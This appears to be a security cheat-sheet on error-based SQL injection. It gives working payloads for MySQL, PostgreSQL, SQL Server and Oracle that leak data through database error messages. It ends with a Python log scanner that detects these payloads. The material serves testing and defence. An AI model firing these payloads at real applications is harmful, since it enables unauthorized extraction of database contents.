
Error-Based SQL Injection

CWE: CWE-89
Tools: sqlmap, ghauri
Difficulty: 🟡 intermediate

Error-Based Extraction

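Error-based injection extracts data through database error messages: the injected expression forces an error whose message text includes the result of a subquery. It works only when the target has verbose error reporting enabled and returns the database error text in its response.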

MySQL

-- ExtractValue method
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))--

-- UpdateXML method
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version()),0x7e),1)--

-- Double query method
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

PostgreSQL

-- CAST error
' AND 1=CAST((SELECT version()) AS INT)--

-- Division by zero (raises an error, but the message does not include the selected value)
' AND 1=1/(SELECT 0 FROM (SELECT version())x)--

Microsoft SQL Server

-- CONVERT method
' AND 1=CONVERT(int,(SELECT @@version))--

-- CAST method
' AND 1=CAST((SELECT @@version) AS int)--

Oracle

-- UTL_INADDR
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT banner FROM v$version WHERE ROWNUM=1))--

-- CTXSYS.DRITHSX.SN
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE ROWNUM=1))--
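For the detection side, the sketch below is an added example (not part of the original page, and not taken from sqlmap or ghauri) that flags the error-raising functions listed above in web access logs. The log line format, the `/item` endpoint and the signature names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures built from the error-raising functions listed on this page.
SIGNATURES = {
    "mysql-extractvalue": r"\bextractvalue\s*\(",
    "mysql-updatexml": r"\bupdatexml\s*\(",
    "mysql-double-query": r"\bfloor\s*\(\s*rand\s*\(.*\bgroup\s+by\b",
    "cast-subquery-to-int": r"\bcast\s*\(\s*\(\s*select\b.*?\bas\s+int",
    "mssql-convert-int": r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b",
    "oracle-utl-inaddr": r"\butl_inaddr\s*\.\s*get_host_address\s*\(",
    "oracle-ctxsys-drithsx": r"\bctxsys\s*\.\s*drithsx\s*\.\s*sn\s*\(",
}
COMPILED = {n: re.compile(p, re.I | re.S) for n, p in SIGNATURES.items()}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(uri):
    """URL-decode twice (catches double encoding), drop /* */ comments, collapse whitespace."""
    uri = unquote_plus(unquote_plus(uri))
    uri = re.sub(r"/\*.*?\*/", " ", uri, flags=re.S)
    return re.sub(r"\s+", " ", uri)

def classify(uri):
    """Return the sorted names of every signature found in one request URI."""
    text = normalize(uri)
    return sorted(n for n, rx in COMPILED.items() if rx.search(text))

def scan(log_lines):
    """Return (line_number, status, hits) for each log line with at least one hit."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        hits = classify(m.group(1)) if m else []
        if hits:
            findings.append((lineno, int(line.rsplit(" ", 1)[1]), hits))
    return findings

# Constructed sample log (documentation-range IPs, hypothetical endpoints).
SAMPLE_LOG = [
    '203.0.113.7 "GET /item?id=42 HTTP/1.1" 200',
    '203.0.113.7 "GET /item?id=1%27%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20version()),0x7e))-- HTTP/1.1" 500',
    '203.0.113.7 "GET /item?id=1%2527%2520AND%25201=cAsT((SELECT%2520version())%2520AS%2520INT)-- HTTP/1.1" 500',
    '203.0.113.7 "GET /item?id=1\'+AND+1=CONVERT(int,(SELECT+@@version))-- HTTP/1.1" 200',
    '203.0.113.9 "GET /search?q=convert+int+to+string HTTP/1.1" 200',
]

if __name__ == "__main__":
    for lineno, status, hits in scan(SAMPLE_LOG):
        print(f"line {lineno} status={status} {hits}")
```

A hit marks an attempt; whether anything leaked depends on the response carrying the database error text, so pair these findings with a check that the application returns a generic error page.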